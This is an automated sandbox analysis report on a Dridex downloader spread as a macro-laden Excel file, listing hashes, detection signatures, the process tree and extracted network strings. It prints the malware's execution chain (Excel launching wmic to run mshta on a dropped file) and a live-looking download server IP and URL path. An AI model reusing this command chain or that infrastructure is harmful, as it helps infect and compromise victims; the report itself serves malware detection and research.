Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 08676789691.xlsm

Overview

General Information

Sample Name:08676789691.xlsm
Analysis ID:532305
MD5:2ac8e068af04acae7b07a376b1adcf57
SHA1:7034cd5a8fb78c201bfeae534c301029c2150bfe
SHA256:7efd1141f6d4858cd381b53fabdb2906a0a23c1329dbae42327aeda63c934dfb
Tags:Dridexxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Sigma detected: TA505 Dropper Load Pattern
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Launches processes in debugging mode, may be used to hinder debugging
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5036 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 2176 cmdline: wmic process call create "mshta C:\ProgramData\SKZbt.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WmiPrvSE.exe (PID: 984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • mshta.exe (PID: 6124 cmdline: mshta C:\ProgramData\SKZbt.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\SKZbt.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: TA505 Dropper Load PatternShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\SKZbt.rtf, CommandLine: mshta C:\ProgramData\SKZbt.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 984, ProcessCommandLine: mshta C:\ProgramData\SKZbt.rtf, ProcessId: 6124
      Sigma detected: Suspicious MSHTA Process PatternsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\SKZbt.rtf, CommandLine: mshta C:\ProgramData\SKZbt.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 984, ProcessCommandLine: mshta C:\ProgramData\SKZbt.rtf, ProcessId: 6124
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\SKZbt.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\SKZbt.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5036, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\SKZbt.rtf", ProcessId: 2176
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\SKZbt.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\SKZbt.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5036, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\SKZbt.rtf", ProcessId: 2176

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 08676789691.xlsmReversingLabs: Detection: 15%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Source: global trafficTCP traffic: 192.168.2.6:49825 -> 157.230.250.107:8080
      Source: global trafficTCP traffic: 192.168.2.6:49825 -> 157.230.250.107:8080
      Source: global trafficTCP traffic: 192.168.2.6:49825 -> 157.230.250.107:8080
      Source: Joe Sandbox ViewIP Address: 157.230.250.107 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8
      Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/
      Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/$
      Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/K
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mf
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkr
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrm
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmot
      Source: mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfucker
      Source: mshta.exe, 00000015.00000002.616675030.000001E529CC1000.00000004.00000020.sdmp, mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y
      Source: mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y8
      Source: mshta.exe, 00000015.00000002.616675030.000001E529CC1000.00000004.00000020.sdmp, mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82s
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sas4
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhR
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhore
      Source: mshta.exe, 00000015.00000003.544339050.000001E529C6B000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616453866.000001E529C64000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9
      Source: mshta.exe, 00000015.00000002.619578044.000001ED2C934000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544266956.000001ED2C92F000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e)
      Source: mshta.exe, 00000015.00000003.544339050.000001E529C6B000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e8
      Source: mshta.exe, 00000015.00000003.544339050.000001E529C6B000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9eB
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9en
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehx
      Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/n
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/tf
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:808dll
      Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpString found in binary or memory: http://157.D
      Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesve
      Source: EXCEL.EXE, 00000000.00000002.626211549.000000000D6EE000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagramV
      Source: EXCEL.EXE, 00000000.00000002.626177284.000000000D6CE000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table5X
      Source: EXCEL.EXE, 00000000.00000003.470229606.0000000015A74000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469474716.0000000015BB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469644138.0000000015C27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472175577.000000001590F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472166299.0000000015BB7000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
      Source: EXCEL.EXE, 00000000.00000003.472175577.000000001590F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
      Source: EXCEL.EXE, 00000000.00000003.470229606.0000000015A74000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469474716.0000000015BB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469644138.0000000015C27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472166299.0000000015BB7000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxdC
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryb
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.aadrm.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.aadrm.com/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
